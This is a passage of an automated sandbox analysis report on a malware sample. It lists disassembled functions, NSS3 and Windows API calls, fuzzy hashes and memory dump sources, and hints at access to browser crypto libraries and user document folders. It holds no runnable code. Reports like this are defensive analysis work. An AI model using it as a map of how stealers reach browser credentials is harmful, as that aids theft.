                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6550e8274baa4e92a385031effcd9837f3f6cf934e213440a7d12ba35be10bfc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5816C71A002859FEB14DF66D884BBFB7B5FF48349F144428E8299B751D738E814CBA2
                                                                                                                                                                                                              Function 6CB2CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB2C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CB2DAE2,?), ref: 6CB2C6C2
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CB2CD35
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                                • Part of subcall function 6CB16C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C3F
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CB2CD54
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                                • Part of subcall function 6CB17260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1CCC,00000000,00000000,?,?), ref: 6CB1729F
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB2CD9B
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CB2CE0B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CB2CE2C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CB2CE40
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaMark_Util.NSS3(?,6CB2CD93,?), ref: 6CB2CEEE
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB2CD93,?), ref: 6CB2CEFC
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB2CD93,?), ref: 6CB2CF0B
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB2CD93,?), ref: 6CB2CF1D
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF47
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF67
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CB2CD93,?,?,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                                                              • Opcode ID: 9a7a7340194a38b8e22cdf16929a485af572a6942a11f1fa4c41b46301fca365
                                                                                                                                                                                                              • Instruction ID: ae3eed12690337f69a5ff783f87cc1bd241d1e506ee88014adff91f80e2679d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a7a7340194a38b8e22cdf16929a485af572a6942a11f1fa4c41b46301fca365
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44519FB6A012509BFB10EF69DC40BBA73E4EF48348F250524D95DA7B41EB39F905CB92
                                                                                                                                                                                                              Function 6CAFEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CAFEF38
                                                                                                                                                                                                                • Part of subcall function 6CAE9520: PK11_IsLoggedIn.NSS3(00000000,?,6CB1379E,?,00000001,?), ref: 6CAE9542
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CAFEF53
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: TlsGetValue.KERNEL32 ref: 6CB04C4C
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: EnterCriticalSection.KERNEL32(?), ref: 6CB04C60
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CA1
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB04CBE
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CD2
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D3A
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAFEF9E
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAFEFC3
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAFF016
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAFF022
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2459274275-0
                                                                                                                                                                                                              • Opcode ID: a165c957ec7efebcd49d2fcab981f95f4bda1a8585cc17e22a2a4fa765061b53
                                                                                                                                                                                                              • Instruction ID: 3818221ac9a534620beffb4123f2018d3b2a5d29dd37710194cb55ee3888063d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a165c957ec7efebcd49d2fcab981f95f4bda1a8585cc17e22a2a4fa765061b53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC4171B1E0020AABDF018FA9DC45BEE7BB9AF48358F044029F914A7750E771C956CBA1
                                                                                                                                                                                                              Function 00933299 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strtok_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3330995566-0
                                                                                                                                                                                                              • Opcode ID: fd7173024faee94e8cabf1d916b2c66e4c46f5c8cc9a8419b3d18f1e2cb4404f
                                                                                                                                                                                                              • Instruction ID: 9a87a7e6838a06d77e6be33a0d11cae55feaae03f39c032e09163454da833a40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd7173024faee94e8cabf1d916b2c66e4c46f5c8cc9a8419b3d18f1e2cb4404f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15319C71E91205AFCB14CF64CC85B69BBACAF5870AFA1C459E806DB092DB38CB449F40
                                                                                                                                                                                                              Function 6CB15ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CB15D71), ref: 6CB15F0A
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB15F1F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(89000904), ref: 6CB15F2F
                                                                                                                                                                                                              • PR_Unlock.NSS3(890008E8), ref: 6CB15F55
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB15F6D
                                                                                                                                                                                                              • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CB15F7D
                                                                                                                                                                                                                • Part of subcall function 6CB15220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CB15F82,8B4274C0), ref: 6CB15248
                                                                                                                                                                                                                • Part of subcall function 6CB15220: EnterCriticalSection.KERNEL32(0F6CBE0D,?,6CB15F82,8B4274C0), ref: 6CB1525C
                                                                                                                                                                                                                • Part of subcall function 6CB15220: PR_SetError.NSS3(00000000,00000000), ref: 6CB1528E
                                                                                                                                                                                                                • Part of subcall function 6CB15220: PR_Unlock.NSS3(0F6CBDF1), ref: 6CB15299
                                                                                                                                                                                                                • Part of subcall function 6CB15220: free.MOZGLUE(00000000), ref: 6CB152A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3150690610-0
                                                                                                                                                                                                              • Opcode ID: d4744feddab7ef0a742ee53397edcd44fe64423145b4e398b0baa42d969627db
                                                                                                                                                                                                              • Instruction ID: a919cbb14efcb16afd3f2f63c434f846965fd12d6a1625335e3a839cfaf196da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4744feddab7ef0a742ee53397edcd44fe64423145b4e398b0baa42d969627db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721B7B1D042489FDF10AF69DC45AEEB7B4FF49318F540029E90AA7B41E731A958CBD1
                                                                                                                                                                                                              Function 6CB53C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB53D3F
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_NewArena_Util.NSS3(00000800,6CB53CAF,?), ref: 6CACBABF
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CB53CAF,?), ref: 6CACBAD5
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CB53CAF,?), ref: 6CACBB08
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB53CAF,?), ref: 6CACBB1A
                                                                                                                                                                                                                • Part of subcall function 6CACBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CB53CAF,?), ref: 6CACBB3B
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB53CCB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890AB
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB890C9
                                                                                                                                                                                                                • Part of subcall function 6CB89090: EnterCriticalSection.KERNEL32 ref: 6CB890E5
                                                                                                                                                                                                                • Part of subcall function 6CB89090: TlsGetValue.KERNEL32 ref: 6CB89116
                                                                                                                                                                                                                • Part of subcall function 6CB89090: LeaveCriticalSection.KERNEL32 ref: 6CB8913F
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB53CE2
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB53CF8
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB53D15
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB53D2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4030862364-0
                                                                                                                                                                                                              • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                              • Instruction ID: 330e0c4baeebf4cc5c3884574f1bf37c9f1626fc1cc961050aa9e6f3358df008
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F110875A116906FE7215E65EC4179FB2F9EB11208F900534E40A87B60E632F829C653
                                                                                                                                                                                                              Function 6CB1FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB1FE08
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB1FE1D
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB1FE29
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB1FE3D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB1FE62
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6CB1FE6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 660648399-0
                                                                                                                                                                                                              • Opcode ID: 749fd2e0741874e8960683314cf633afab5ab875f78189c4b1de2d47bd129f71
                                                                                                                                                                                                              • Instruction ID: bafebff6668d045347fa3e9c14e2ca4e3f4dedd28f413fc7b4faab1892b5ccd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 749fd2e0741874e8960683314cf633afab5ab875f78189c4b1de2d47bd129f71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211E5B7A04281ABEB008B55EC40E6BB398EF58299F148134ED1C87F12E731E914C792
                                                                                                                                                                                                              Function 6CBCFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Lock.NSS3 ref: 6CBCFD9E
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CAB1A48), ref: 6CB89BB3
                                                                                                                                                                                                                • Part of subcall function 6CB89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CAB1A48), ref: 6CB89BC8
                                                                                                                                                                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6CBCFDB9
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: TlsGetValue.KERNEL32(00000000,?,6CC214E4,?,6CA44DD9), ref: 6CAAA90F
                                                                                                                                                                                                                • Part of subcall function 6CAAA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CAAA94F
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBCFDD4
                                                                                                                                                                                                              • PR_Lock.NSS3 ref: 6CBCFDF2
                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3 ref: 6CBCFE0D
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBCFE23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3365241057-0
                                                                                                                                                                                                              • Opcode ID: 1135eaef1a7bc10b2da3fcc90d388b084721bb994fbce10db2fbf51ee87a4f90
                                                                                                                                                                                                              • Instruction ID: 264da0aaf3c355ba3720f7b8928e22c466821c00d6cf7306c2fcfe07f95d028e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1135eaef1a7bc10b2da3fcc90d388b084721bb994fbce10db2fbf51ee87a4f90
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 330161FAA102919BDF045E6AFC008557771FB022687154374E82A47BE2E723ED28C682
                                                                                                                                                                                                              Function 009320E3 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00000000,?,?,?,009337D4,00000000,00000010), ref: 009320EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(C:\Users\user\Documents\,?,00000000,?), ref: 00932107
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00932119
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093212B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\Documents\
